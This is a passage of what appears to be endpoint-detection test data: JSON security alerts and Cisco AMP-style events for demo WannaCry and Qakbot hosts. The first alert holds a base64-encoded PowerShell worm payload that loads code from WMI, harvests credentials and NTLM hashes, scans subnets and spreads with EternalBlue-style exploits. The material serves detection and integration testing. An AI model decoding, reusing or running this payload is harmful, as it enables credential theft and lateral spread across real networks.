AcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 